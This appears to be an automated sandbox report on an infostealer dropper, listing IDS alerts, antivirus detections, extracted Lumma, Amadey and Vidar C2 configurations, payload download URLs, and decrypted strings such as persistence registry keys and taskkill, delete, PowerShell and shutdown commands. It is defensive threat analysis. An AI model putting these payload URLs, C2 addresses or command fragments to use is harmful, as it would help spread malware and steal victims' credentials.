2025-02-18T07:35:35.249732+0100	2060063	1	Domain Observed Used for C2 Detected	192.168.2.9	64862	104.21.60.59	443	TCP
2025-02-18T07:35:37.519431+0100	2060063	1	Domain Observed Used for C2 Detected	192.168.2.9	64867	104.21.60.59	443	TCP

ET MALWARE Observed Win32/Lumma Stealer Related Domain (mercharena .biz in TLS SNI)

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2025-02-18T07:35:21.375405+0100	2060073	1	Domain Observed Used for C2 Detected	192.168.2.9	64832	188.114.96.3	443	TCP
2025-02-18T07:35:22.538984+0100	2060073	1	Domain Observed Used for C2 Detected	192.168.2.9	64834	188.114.96.3	443	TCP
2025-02-18T07:35:26.562581+0100	2060073	1	Domain Observed Used for C2 Detected	192.168.2.9	64841	188.114.96.3	443	TCP
2025-02-18T07:35:27.751337+0100	2060073	1	Domain Observed Used for C2 Detected	192.168.2.9	64847	188.114.96.3	443	TCP
2025-02-18T07:35:29.069743+0100	2060073	1	Domain Observed Used for C2 Detected	192.168.2.9	64851	188.114.96.3	443	TCP
2025-02-18T07:35:30.431168+0100	2060073	1	Domain Observed Used for C2 Detected	192.168.2.9	64853	188.114.96.3	443	TCP
2025-02-18T07:35:34.644107+0100	2060073	1	Domain Observed Used for C2 Detected	192.168.2.9	64860	188.114.96.3	443	TCP
2025-02-18T07:35:39.917813+0100	2060073	1	Domain Observed Used for C2 Detected	192.168.2.9	64870	188.114.96.3	443	TCP

ET MALWARE Win32/Amadey Host Fingerprint Exfil (POST) M2

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2025-02-18T07:34:11.990346+0100	2044696	1	A Network Trojan was detected	192.168.2.9	64640	185.215.113.43	80	TCP
2025-02-18T07:34:20.718314+0100	2044696	1	A Network Trojan was detected	192.168.2.9	64656	185.215.113.43	80	TCP
2025-02-18T07:34:26.510679+0100	2044696	1	A Network Trojan was detected	192.168.2.9	64667	185.215.113.43	80	TCP
2025-02-18T07:34:30.982178+0100	2044696	1	A Network Trojan was detected	192.168.2.9	64676	185.215.113.43	80	TCP
2025-02-18T07:34:35.860341+0100	2044696	1	A Network Trojan was detected	192.168.2.9	64685	185.215.113.43	80	TCP
2025-02-18T07:34:44.517142+0100	2044696	1	A Network Trojan was detected	192.168.2.9	64698	185.215.113.43	80	TCP
2025-02-18T07:34:48.591202+0100	2044696	1	A Network Trojan was detected	192.168.2.9	64711	185.215.113.43	80	TCP
2025-02-18T07:34:56.362844+0100	2044696	1	A Network Trojan was detected	192.168.2.9	64732	185.215.113.43	80	TCP
2025-02-18T07:35:00.809309+0100	2044696	1	A Network Trojan was detected	192.168.2.9	64737	185.215.113.43	80	TCP
2025-02-18T07:35:06.036140+0100	2044696	1	A Network Trojan was detected	192.168.2.9	64748	185.215.113.43	80	TCP
2025-02-18T07:35:11.398259+0100	2044696	1	A Network Trojan was detected	192.168.2.9	64779	185.215.113.43	80	TCP
2025-02-18T07:35:17.268449+0100	2044696	1	A Network Trojan was detected	192.168.2.9	64822	185.215.113.43	80	TCP
2025-02-18T07:35:22.464800+0100	2044696	1	A Network Trojan was detected	192.168.2.9	64833	185.215.113.43	80	TCP
2025-02-18T07:35:27.526699+0100	2044696	1	A Network Trojan was detected	192.168.2.9	64845	185.215.113.43	80	TCP

ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (blastikcn .com)

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2025-02-18T07:34:19.077792+0100	2060062	1	Domain Observed Used for C2 Detected	192.168.2.9	61804	1.1.1.1	53	UDP

ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (mercharena .biz)

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2025-02-18T07:35:20.848140+0100	2060072	1	Domain Observed Used for C2 Detected	192.168.2.9	61591	1.1.1.1	53	UDP

ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (naturewsounds .help)

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2025-02-18T07:35:20.464884+0100	2060102	1	Domain Observed Used for C2 Detected	192.168.2.9	55365	1.1.1.1	53	UDP

ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (shiningrstars .help)

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2025-02-18T07:35:20.614037+0100	2060104	1	Domain Observed Used for C2 Detected	192.168.2.9	51110	1.1.1.1	53	UDP

ET MALWARE Win32/Stealc/Vidar Stealer Active C2 Responding with plugins Config

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2025-02-18T07:34:38.851046+0100	2044247	1	Malware Command and Control Activity Detected	5.75.210.149	443	192.168.2.9	64689	TCP

ET MALWARE Win32/Stealc/Vidar Stealer Active C2 Responding with plugins Config M1

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2025-02-18T07:34:40.188031+0100	2051831	1	Malware Command and Control Activity Detected	5.75.210.149	443	192.168.2.9	64692	TCP

ET MALWARE Win32/Stealc/Vidar Stealer Style Headers In HTTP POST M1

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2025-02-18T07:34:37.472164+0100	2049087	1	A Network Trojan was detected	192.168.2.9	64688	5.75.210.149	443	TCP

ET MALWARE Win32/Stealc/Vidar Stealer Style Headers In HTTP POST M2

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2025-02-18T07:34:41.633603+0100	2059331	1	Malware Command and Control Activity Detected	192.168.2.9	64694	5.75.210.149	443	TCP
2025-02-18T07:34:44.066024+0100	2059331	1	Malware Command and Control Activity Detected	192.168.2.9	64697	5.75.210.149	443	TCP
2025-02-18T07:34:53.159115+0100	2059331	1	Malware Command and Control Activity Detected	192.168.2.9	64723	5.75.210.149	443	TCP
2025-02-18T07:34:53.402571+0100	2059331	1	Malware Command and Control Activity Detected	192.168.2.9	64729	5.75.210.149	443	TCP
2025-02-18T07:34:54.822026+0100	2059331	1	Malware Command and Control Activity Detected	192.168.2.9	64730	5.75.210.149	443	TCP
2025-02-18T07:34:55.967436+0100	2059331	1	Malware Command and Control Activity Detected	192.168.2.9	64731	5.75.210.149	443	TCP
2025-02-18T07:34:57.816155+0100	2059331	1	Malware Command and Control Activity Detected	192.168.2.9	64733	5.75.210.149	443	TCP

ET MALWARE [ANY.RUN] Win32/Lumma Stealer Exfiltration

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2025-02-18T07:34:15.188214+0100	2048094	1	Malware Command and Control Activity Detected	192.168.2.9	64646	172.67.150.155	443	TCP
2025-02-18T07:34:23.591434+0100	2048094	1	Malware Command and Control Activity Detected	192.168.2.9	64662	104.21.60.59	443	TCP
2025-02-18T07:34:33.678909+0100	2048094	1	Malware Command and Control Activity Detected	192.168.2.9	64680	188.114.96.3	443	TCP
2025-02-18T07:35:12.700230+0100	2048094	1	Malware Command and Control Activity Detected	192.168.2.9	64790	172.67.150.155	443	TCP
2025-02-18T07:35:22.204848+0100	2048094	1	Malware Command and Control Activity Detected	192.168.2.9	64831	104.21.48.1	443	TCP
2025-02-18T07:35:27.258563+0100	2048094	1	Malware Command and Control Activity Detected	192.168.2.9	64841	188.114.96.3	443	TCP
2025-02-18T07:35:30.670299+0100	2048094	1	Malware Command and Control Activity Detected	192.168.2.9	64852	104.21.60.59	443	TCP

ET MALWARE [SEKOIA.IO] Win32/Stealc C2 Check-in

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2025-02-18T07:34:26.738394+0100	2044243	1	Malware Command and Control Activity Detected	192.168.2.9	64668	91.202.233.244	80	TCP

ETPRO MALWARE Amadey CnC Activity M2

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2025-02-18T07:34:39.590956+0100	2856121	1	A Network Trojan was detected	192.168.2.9	64691	185.215.113.43	80	TCP
2025-02-18T07:34:52.562239+0100	2856121	1	A Network Trojan was detected	192.168.2.9	64726	185.215.113.43	80	TCP

ETPRO MALWARE Amadey CnC Activity M3

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2025-02-18T07:34:04.971670+0100	2856147	1	A Network Trojan was detected	192.168.2.9	64635	185.215.113.43	80	TCP

ETPRO MALWARE Amadey CnC Response M1

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2025-02-18T07:34:11.275252+0100	2856122	1	A Network Trojan was detected	185.215.113.43	80	192.168.2.9	64636	TCP

ETPRO MALWARE Common Downloader Header Pattern H

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2025-02-18T07:34:08.419629+0100	2803305	3	Unknown Traffic	192.168.2.9	64637	185.215.113.75	80	TCP
2025-02-18T07:34:12.703258+0100	2803305	3	Unknown Traffic	192.168.2.9	64642	185.215.113.75	80	TCP
2025-02-18T07:34:21.427419+0100	2803305	3	Unknown Traffic	192.168.2.9	64657	185.215.113.75	80	TCP
2025-02-18T07:34:27.237532+0100	2803305	3	Unknown Traffic	192.168.2.9	64670	185.215.113.75	80	TCP
2025-02-18T07:34:31.699886+0100	2803305	3	Unknown Traffic	192.168.2.9	64677	185.215.113.75	80	TCP
2025-02-18T07:34:36.674128+0100	2803305	3	Unknown Traffic	192.168.2.9	64687	104.21.21.16	443	TCP
2025-02-18T07:34:40.291038+0100	2803305	3	Unknown Traffic	192.168.2.9	64693	185.215.113.16	80	TCP
2025-02-18T07:34:45.216296+0100	2803305	3	Unknown Traffic	192.168.2.9	64700	185.215.113.16	80	TCP
2025-02-18T07:34:57.101617+0100	2803305	3	Unknown Traffic	192.168.2.9	64734	185.215.113.75	80	TCP
2025-02-18T07:35:07.088233+0100	2803305	3	Unknown Traffic	192.168.2.9	64756	185.215.113.75	80	TCP
2025-02-18T07:35:12.223276+0100	2803305	3	Unknown Traffic	192.168.2.9	64789	185.215.113.75	80	TCP
2025-02-18T07:35:18.189918+0100	2803305	3	Unknown Traffic	192.168.2.9	64828	185.215.113.75	80	TCP
2025-02-18T07:35:28.276142+0100	2803305	3	Unknown Traffic	192.168.2.9	64848	185.215.113.16	80	TCP

ETPRO MALWARE Vidar/StealC CnC Exfil via SQL Database (POST)

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2025-02-18T07:34:53.402571+0100	2859636	1	Malware Command and Control Activity Detected	192.168.2.9	64729	5.75.210.149	443	TCP
2025-02-18T07:34:54.822026+0100	2859636	1	Malware Command and Control Activity Detected	192.168.2.9	64730	5.75.210.149	443	TCP
2025-02-18T07:34:55.967436+0100	2859636	1	Malware Command and Control Activity Detected	192.168.2.9	64731	5.75.210.149	443	TCP

ETPRO MALWARE Win32/Stealc/Vidar Stealer Host Details Exfil (POST) M2

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2025-02-18T07:34:36.097778+0100	2859378	1	Malware Command and Control Activity Detected	192.168.2.9	64684	5.75.210.149	443	TCP

Joe Sandbox Signatures

Click to jump to signature section

Show All Signature Results

AV Detection

Antivirus / Scanner detection for submitted sample

Source: hHtR1O06GH.exe

Avira: detected

Antivirus detection for URL or domain

Source: http://185.215.113.75/files/5728215906/d2YQIJa.exe/TXg	Avira URL Cloud: Label: malware
Source: http://185.215.113.75/files/8091669947/m5UP2Yj.exe	Avira URL Cloud: Label: phishing
Source: https://nestlecompany.world/	Avira URL Cloud: Label: malware
Source: https://nestlecompany.world/apik	Avira URL Cloud: Label: malware
Source: https://blastikcn.com/api	Avira URL Cloud: Label: malware
Source: https://blastikcn.com:443/api	Avira URL Cloud: Label: malware

Antivirus detection for dropped file

Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\4UK5I61J\random[1].exe	Avira: detection malicious, Label: TR/Crypt.XPACK.Gen
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\4UK5I61J\m5UP2Yj[1].exe	Avira: detection malicious, Label: TR/Crypt.TPM.Gen
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\WDKI0JR2\Ta3ZyUR[1].exe	Avira: detection malicious, Label: HEUR/AGEN.1314574
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\HI1BCF07\DTQCxXZ[1].exe	Avira: detection malicious, Label: TR/Crypt.XPACK.Gen
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\QI6Y9C7H\Bjkm5hE[1].exe	Avira: detection malicious, Label: HEUR/AGEN.1314574

Found malware configuration

Source: 00000015.00000002.2220696587.0000000003F0C000.00000004.00000800.00020000.00000000.sdmp	Malware Configuration Extractor: Vidar {"C2 url": "https://steamcommunity.com/profiles/76561199828130190", "Botnet": "ot0yikam"}
Source: 00000008.00000002.2117478393.0000000003E19000.00000004.00000800.00020000.00000000.sdmp	Malware Configuration Extractor: LummaC {"C2 url": ["RadiatntIdeas.top", "nestlecompany.world", "mercharena.biz", "generalmills.pro", "stormlegue.com", "blast-hubs.com", "blastikcn.com", "nestlecompany.pro"], "Build id": "LPnhqo--fkihebqszcey"}
Source: 00000002.00000002.1552770574.0000000000451000.00000040.00000001.01000000.00000007.sdmp	Malware Configuration Extractor: Amadey {"C2 url": "185.215.113.43/Zu7JuNko/index.php", "Version": "4.42", "Install Folder": "abc3bc1985", "Install File": "skotes.exe"}

Multi AV Scanner detection for dropped file

Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\4UK5I61J\m5UP2Yj[1].exe	ReversingLabs: Detection: 56%
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\HI1BCF07\DTQCxXZ[1].exe	ReversingLabs: Detection: 79%
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\HI1BCF07\jROrnzx[1].exe	ReversingLabs: Detection: 54%
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\QI6Y9C7H\Bjkm5hE[1].exe	ReversingLabs: Detection: 70%
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\QI6Y9C7H\qFqSpAp[1].exe	ReversingLabs: Detection: 70%
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\WDKI0JR2\7aencsM[1].exe	ReversingLabs: Detection: 45%
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\WDKI0JR2\Ta3ZyUR[1].exe	ReversingLabs: Detection: 50%
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\WDKI0JR2\d2YQIJa[1].exe	ReversingLabs: Detection: 51%
Source: C:\Users\user\AppData\Local\Temp\1083135001\Ta3ZyUR.exe	ReversingLabs: Detection: 50%
Source: C:\Users\user\AppData\Local\Temp\1083218001\qFqSpAp.exe	ReversingLabs: Detection: 70%
Source: C:\Users\user\AppData\Local\Temp\1083537001\m5UP2Yj.exe	ReversingLabs: Detection: 56%
Source: C:\Users\user\AppData\Local\Temp\1084785001\jROrnzx.exe	ReversingLabs: Detection: 54%
Source: C:\Users\user\AppData\Local\Temp\1084873001\7aencsM.exe	ReversingLabs: Detection: 45%
Source: C:\Users\user\AppData\Local\Temp\1085382001\7aencsM.exe	ReversingLabs: Detection: 45%
Source: C:\Users\user\AppData\Local\Temp\1085386001\Ta3ZyUR.exe	ReversingLabs: Detection: 50%
Source: C:\Users\user\AppData\Local\Temp\1085387001\DTQCxXZ.exe	ReversingLabs: Detection: 79%
Source: C:\Users\user\AppData\Local\Temp\1085388001\d2YQIJa.exe	ReversingLabs: Detection: 51%
Source: C:\Users\user\AppData\Local\Temp\1085389001\Bjkm5hE.exe	ReversingLabs: Detection: 70%
Source: C:\Users\user\AppData\Local\Temp\1085390001\qFqSpAp.exe	ReversingLabs: Detection: 70%
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	ReversingLabs: Detection: 62%

Multi AV Scanner detection for submitted file

Source: hHtR1O06GH.exe	Virustotal: Detection: 58%			Perma Link
Source: hHtR1O06GH.exe	ReversingLabs: Detection: 62%

Joe Sandbox ML detected suspicious sample

Source: Submited Sample

Integrated Neural Analysis Model: Matched 100.0% probability

Sample uses string decryption to hide its real strings

Source: 00000008.00000002.2117478393.0000000003E19000.00000004.00000800.00020000.00000000.sdmp	String decryptor: RadiatntIdeas.top
Source: 00000008.00000002.2117478393.0000000003E19000.00000004.00000800.00020000.00000000.sdmp	String decryptor: nestlecompany.world
Source: 00000008.00000002.2117478393.0000000003E19000.00000004.00000800.00020000.00000000.sdmp	String decryptor: mercharena.biz
Source: 00000008.00000002.2117478393.0000000003E19000.00000004.00000800.00020000.00000000.sdmp	String decryptor: generalmills.pro
Source: 00000008.00000002.2117478393.0000000003E19000.00000004.00000800.00020000.00000000.sdmp	String decryptor: stormlegue.com
Source: 00000008.00000002.2117478393.0000000003E19000.00000004.00000800.00020000.00000000.sdmp	String decryptor: blast-hubs.com
Source: 00000008.00000002.2117478393.0000000003E19000.00000004.00000800.00020000.00000000.sdmp	String decryptor: blastikcn.com
Source: 00000008.00000002.2117478393.0000000003E19000.00000004.00000800.00020000.00000000.sdmp	String decryptor: nestlecompany.pro
Source: 00000002.00000002.1552770574.0000000000451000.00000040.00000001.01000000.00000007.sdmp	String decryptor: 185.215.113.43
Source: 00000002.00000002.1552770574.0000000000451000.00000040.00000001.01000000.00000007.sdmp	String decryptor: /Zu7JuNko/index.php
Source: 00000002.00000002.1552770574.0000000000451000.00000040.00000001.01000000.00000007.sdmp	String decryptor: S-%lu-
Source: 00000002.00000002.1552770574.0000000000451000.00000040.00000001.01000000.00000007.sdmp	String decryptor: abc3bc1985
Source: 00000002.00000002.1552770574.0000000000451000.00000040.00000001.01000000.00000007.sdmp	String decryptor: skotes.exe
Source: 00000002.00000002.1552770574.0000000000451000.00000040.00000001.01000000.00000007.sdmp	String decryptor: SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnce
Source: 00000002.00000002.1552770574.0000000000451000.00000040.00000001.01000000.00000007.sdmp	String decryptor: SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\User Shell Folders
Source: 00000002.00000002.1552770574.0000000000451000.00000040.00000001.01000000.00000007.sdmp	String decryptor: Startup
Source: 00000002.00000002.1552770574.0000000000451000.00000040.00000001.01000000.00000007.sdmp	String decryptor: cmd /C RMDIR /s/q
Source: 00000002.00000002.1552770574.0000000000451000.00000040.00000001.01000000.00000007.sdmp	String decryptor: SOFTWARE\Microsoft\Windows\CurrentVersion\Run
Source: 00000002.00000002.1552770574.0000000000451000.00000040.00000001.01000000.00000007.sdmp	String decryptor: rundll32
Source: 00000002.00000002.1552770574.0000000000451000.00000040.00000001.01000000.00000007.sdmp	String decryptor: Programs
Source: 00000002.00000002.1552770574.0000000000451000.00000040.00000001.01000000.00000007.sdmp	String decryptor: SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders
Source: 00000002.00000002.1552770574.0000000000451000.00000040.00000001.01000000.00000007.sdmp	String decryptor: %USERPROFILE%
Source: 00000002.00000002.1552770574.0000000000451000.00000040.00000001.01000000.00000007.sdmp	String decryptor: cred.dll\|clip.dll\|
Source: 00000002.00000002.1552770574.0000000000451000.00000040.00000001.01000000.00000007.sdmp	String decryptor: cred.dll
Source: 00000002.00000002.1552770574.0000000000451000.00000040.00000001.01000000.00000007.sdmp	String decryptor: clip.dll
Source: 00000002.00000002.1552770574.0000000000451000.00000040.00000001.01000000.00000007.sdmp	String decryptor: http://
Source: 00000002.00000002.1552770574.0000000000451000.00000040.00000001.01000000.00000007.sdmp	String decryptor: https://
Source: 00000002.00000002.1552770574.0000000000451000.00000040.00000001.01000000.00000007.sdmp	String decryptor: /quiet
Source: 00000002.00000002.1552770574.0000000000451000.00000040.00000001.01000000.00000007.sdmp	String decryptor: /Plugins/
Source: 00000002.00000002.1552770574.0000000000451000.00000040.00000001.01000000.00000007.sdmp	String decryptor: &unit=
Source: 00000002.00000002.1552770574.0000000000451000.00000040.00000001.01000000.00000007.sdmp	String decryptor: shell32.dll
Source: 00000002.00000002.1552770574.0000000000451000.00000040.00000001.01000000.00000007.sdmp	String decryptor: kernel32.dll
Source: 00000002.00000002.1552770574.0000000000451000.00000040.00000001.01000000.00000007.sdmp	String decryptor: GetNativeSystemInfo
Source: 00000002.00000002.1552770574.0000000000451000.00000040.00000001.01000000.00000007.sdmp	String decryptor: ProgramData\
Source: 00000002.00000002.1552770574.0000000000451000.00000040.00000001.01000000.00000007.sdmp	String decryptor: AVAST Software
Source: 00000002.00000002.1552770574.0000000000451000.00000040.00000001.01000000.00000007.sdmp	String decryptor: Kaspersky Lab
Source: 00000002.00000002.1552770574.0000000000451000.00000040.00000001.01000000.00000007.sdmp	String decryptor: Panda Security
Source: 00000002.00000002.1552770574.0000000000451000.00000040.00000001.01000000.00000007.sdmp	String decryptor: Doctor Web
Source: 00000002.00000002.1552770574.0000000000451000.00000040.00000001.01000000.00000007.sdmp	String decryptor: 360TotalSecurity
Source: 00000002.00000002.1552770574.0000000000451000.00000040.00000001.01000000.00000007.sdmp	String decryptor: Bitdefender
Source: 00000002.00000002.1552770574.0000000000451000.00000040.00000001.01000000.00000007.sdmp	String decryptor: Norton
Source: 00000002.00000002.1552770574.0000000000451000.00000040.00000001.01000000.00000007.sdmp	String decryptor: Sophos
Source: 00000002.00000002.1552770574.0000000000451000.00000040.00000001.01000000.00000007.sdmp	String decryptor: Comodo
Source: 00000002.00000002.1552770574.0000000000451000.00000040.00000001.01000000.00000007.sdmp	String decryptor: WinDefender
Source: 00000002.00000002.1552770574.0000000000451000.00000040.00000001.01000000.00000007.sdmp	String decryptor: 0123456789
Source: 00000002.00000002.1552770574.0000000000451000.00000040.00000001.01000000.00000007.sdmp	String decryptor: Content-Type: multipart/form-data; boundary=----
Source: 00000002.00000002.1552770574.0000000000451000.00000040.00000001.01000000.00000007.sdmp	String decryptor: ------
Source: 00000002.00000002.1552770574.0000000000451000.00000040.00000001.01000000.00000007.sdmp	String decryptor: ?scr=1
Source: 00000002.00000002.1552770574.0000000000451000.00000040.00000001.01000000.00000007.sdmp	String decryptor: Content-Type: application/x-www-form-urlencoded
Source: 00000002.00000002.1552770574.0000000000451000.00000040.00000001.01000000.00000007.sdmp	String decryptor: SYSTEM\CurrentControlSet\Control\ComputerName\ComputerName
Source: 00000002.00000002.1552770574.0000000000451000.00000040.00000001.01000000.00000007.sdmp	String decryptor: ComputerName
Source: 00000002.00000002.1552770574.0000000000451000.00000040.00000001.01000000.00000007.sdmp	String decryptor: abcdefghijklmnopqrstuvwxyz0123456789-_
Source: 00000002.00000002.1552770574.0000000000451000.00000040.00000001.01000000.00000007.sdmp	String decryptor: -unicode-
Source: 00000002.00000002.1552770574.0000000000451000.00000040.00000001.01000000.00000007.sdmp	String decryptor: SYSTEM\CurrentControlSet\Control\UnitedVideo\CONTROL\VIDEO\
Source: 00000002.00000002.1552770574.0000000000451000.00000040.00000001.01000000.00000007.sdmp	String decryptor: SYSTEM\ControlSet001\Services\BasicDisplay\Video
Source: 00000002.00000002.1552770574.0000000000451000.00000040.00000001.01000000.00000007.sdmp	String decryptor: VideoID
Source: 00000002.00000002.1552770574.0000000000451000.00000040.00000001.01000000.00000007.sdmp	String decryptor: DefaultSettings.XResolution
Source: 00000002.00000002.1552770574.0000000000451000.00000040.00000001.01000000.00000007.sdmp	String decryptor: DefaultSettings.YResolution
Source: 00000002.00000002.1552770574.0000000000451000.00000040.00000001.01000000.00000007.sdmp	String decryptor: SOFTWARE\Microsoft\Windows NT\CurrentVersion
Source: 00000002.00000002.1552770574.0000000000451000.00000040.00000001.01000000.00000007.sdmp	String decryptor: ProductName
Source: 00000002.00000002.1552770574.0000000000451000.00000040.00000001.01000000.00000007.sdmp	String decryptor: CurrentBuild
Source: 00000002.00000002.1552770574.0000000000451000.00000040.00000001.01000000.00000007.sdmp	String decryptor: rundll32.exe
Source: 00000002.00000002.1552770574.0000000000451000.00000040.00000001.01000000.00000007.sdmp	String decryptor: "taskkill /f /im "
Source: 00000002.00000002.1552770574.0000000000451000.00000040.00000001.01000000.00000007.sdmp	String decryptor: " && timeout 1 && del
Source: 00000002.00000002.1552770574.0000000000451000.00000040.00000001.01000000.00000007.sdmp	String decryptor: && Exit"
Source: 00000002.00000002.1552770574.0000000000451000.00000040.00000001.01000000.00000007.sdmp	String decryptor: " && ren
Source: 00000002.00000002.1552770574.0000000000451000.00000040.00000001.01000000.00000007.sdmp	String decryptor: Powershell.exe
Source: 00000002.00000002.1552770574.0000000000451000.00000040.00000001.01000000.00000007.sdmp	String decryptor: -executionpolicy remotesigned -File "
Source: 00000002.00000002.1552770574.0000000000451000.00000040.00000001.01000000.00000007.sdmp	String decryptor: shutdown -s -t 0
Source: 00000002.00000002.1552770574.0000000000451000.00000040.00000001.01000000.00000007.sdmp	String decryptor: random

Source: C:\Users\user\AppData\Local\Temp\1083135001\Ta3ZyUR.exe

Code function: 9_2_00419A7B CryptUnprotectData,

9_2_00419A7B

Phishing

Yara detected Healer AV Disabler

Source: Yara match

File source: Process Memory Space: TempJPCSKBXTSSNCCE8BLGIXIL4VZWJX18ZJ.EXE PID: 5892, type: MEMORYSTR

Yara detected obfuscated html page

Source: Yara match	File source: C:\Users\user\AppData\Local\Temp\UgD7WgJAg.hta, type: DROPPED
Source: Yara match	File source: C:\Temp\nRyLXHovP.hta, type: DROPPED
Source: Yara match	File source: C:\Users\user\AppData\Local\Temp\qBrryFCFZ.hta, type: DROPPED

Source: hHtR1O06GH.exe

Static PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE

Source: unknown	HTTPS traffic detected: 172.67.150.155:443 -> 192.168.2.9:64638 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 172.67.150.155:443 -> 192.168.2.9:64641 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 172.67.150.155:443 -> 192.168.2.9:64645 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 172.67.150.155:443 -> 192.168.2.9:64646 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 172.67.150.155:443 -> 192.168.2.9:64647 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 172.67.150.155:443 -> 192.168.2.9:64650 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 104.21.60.59:443 -> 192.168.2.9:64652 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 172.67.150.155:443 -> 192.168.2.9:64653 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 104.21.60.59:443 -> 192.168.2.9:64655 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 172.67.150.155:443 -> 192.168.2.9:64660 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 104.21.60.59:443 -> 192.168.2.9:64661 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 104.21.60.59:443 -> 192.168.2.9:64662 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 104.21.60.59:443 -> 192.168.2.9:64666 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 104.21.60.59:443 -> 192.168.2.9:64669 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 104.21.60.59:443 -> 192.168.2.9:64671 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 188.114.96.3:443 -> 192.168.2.9:64672 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 104.21.60.59:443 -> 192.168.2.9:64673 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 188.114.96.3:443 -> 192.168.2.9:64675 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 188.114.96.3:443 -> 192.168.2.9:64679 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 188.114.96.3:443 -> 192.168.2.9:64680 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 5.75.210.149:443 -> 192.168.2.9:64681 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 188.114.96.3:443 -> 192.168.2.9:64683 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 188.114.96.3:443 -> 192.168.2.9:64686 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 104.21.21.16:443 -> 192.168.2.9:64687 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 188.114.96.3:443 -> 192.168.2.9:64696 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 188.114.96.3:443 -> 192.168.2.9:64701 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 172.67.150.155:443 -> 192.168.2.9:64757 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 172.67.150.155:443 -> 192.168.2.9:64774 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 172.67.150.155:443 -> 192.168.2.9:64790 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 172.67.150.155:443 -> 192.168.2.9:64797 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 172.67.150.155:443 -> 192.168.2.9:64812 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 172.67.150.155:443 -> 192.168.2.9:64823 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 188.114.96.3:443 -> 192.168.2.9:64832 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 188.114.96.3:443 -> 192.168.2.9:64834 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 172.67.150.155:443 -> 192.168.2.9:64835 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 172.67.150.155:443 -> 192.168.2.9:64840 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 188.114.96.3:443 -> 192.168.2.9:64841 version: TLS 1.2
